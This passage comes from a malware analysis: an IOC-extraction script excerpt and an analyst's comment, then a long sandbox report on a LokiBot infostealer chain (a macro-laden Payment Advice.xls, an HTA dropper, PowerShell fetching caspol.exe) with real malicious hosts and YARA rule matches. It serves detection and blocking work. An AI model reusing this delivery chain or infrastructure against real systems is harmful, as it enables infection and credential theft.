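    f"Source: {M1D}, Payment Advice.xls, CA430000.0.dr{S}{PHISH}",
    f"Source: {M4}{S}{PHISH}0k", f"Source: {M1D}{S}{PHISH}2",
    f"Source: {M1D}{S}{PHISH}vc", f"Source: {M4}{S}{PHISH}k.hta",
    f"Source: {M4}{S}https://provit.uk/", f"Source: {M4}{S}https://provit.uk/:",
    f"Source: {M4}{S}http://ocsp.comodoca.com0", f"Source: {M4}{S}http://ocsp.comodoca.com0%",
    "Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2",
    "Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49165 version: TLS 1.2",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443",
]

if __name__ == "__main__":
    result = extract_iocs(REPORT_LINES)
    for url, sources in result["urls"].items():
        print(f"{url}  <- {', '.join(sources)}")
    print("TLS servers:", result["tls_servers"])
```

                    Collapsing only toward strings the sandbox actually printed keeps the IOC list honest: http://ocsp.comodoca.com0 stays as carved rather than being "repaired" into the real OCSP responder, and the CRL/OCSP/contoso/nuget entries are benign library and certificate strings to exclude, not indicators. What survives for blocking and hunting is the 192.3.243.136 stager paths, the provit.uk URL (present in the sample itself, per the Payment Advice.xls and CA430000.0.dr sources) and the single TLS server 198.244.140.41, which is presumably the provit.uk host since it is the only HTTPS endpoint in the traffic entries.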

                    System Summary

                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                    Source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                    Source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: Process Memory Space: caspol.exe PID: 3888, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: Process Memory Space: rrwscqkDSNwLK.exe PID: 1644, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: Process Memory Space: rrwscqkDSNwLK.exe PID: 3576, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: Process Memory Space: caspol.exe PID: 4076, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: Payment Advice.xls | OLE: Microsoft Excel 2007+
                    Source: ~DF6CCF4596F2406470.TMP.0.dr | OLE: Microsoft Excel 2007+
                    Source: CA430000.0.dr | OLE: Microsoft Excel 2007+
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\caspol.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Memory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Memory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_000007FE892700DD
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 11_2_003804C0
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 11_2_00382808
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 11_2_0038108F
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 11_2_003810DC
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 11_2_0038C178
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 11_2_0038C5B0
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 11_2_003827F7
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 11_2_0038D9D8
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 11_2_0038CAF8
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 11_2_0038BD40
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 11_2_00381F68
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Code function: 21_2_003A04C0
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Code function: 21_2_003A2808
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Code function: 21_2_003A108F
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Code function: 21_2_003A10DA
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Code function: 21_2_003AC178
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Code function: 21_2_003AC5B0
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Code function: 21_2_003AD9D8
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Code function: 21_2_003ACAF8
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Code function: 21_2_003ABD40
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Code function: 28_2_0040549C
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Code function: 28_2_004029D4
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 37_2_003704C0
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 37_2_00372808
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 37_2_003710D2
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 37_2_0037C178
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 37_2_0037C5B0
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 37_2_0037D9D8
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 37_2_0037CAF8
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 37_2_0037BD40
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Code function: 37_2_00371F68
                    Source: Payment Advice.xls | OLE indicator, VBA macros: true
                    Source: tmpAAE0.tmp.11.dr | OLE indicator, VBA macros: true
                    Source: tmpDCB9.tmp.21.dr | OLE indicator, VBA macros: true
                    Source: tmp1F44.tmp.37.dr | OLE indicator, VBA macros: true
                    Source: ~DF6CCF4596F2406470.TMP.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: tmpAAE0.tmp.11.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: tmpDCB9.tmp.21.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: tmp1F44.tmp.37.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Code function: String function: 0041219C appears 45 times
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Code function: String function: 00405B6F appears 42 times
                    Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
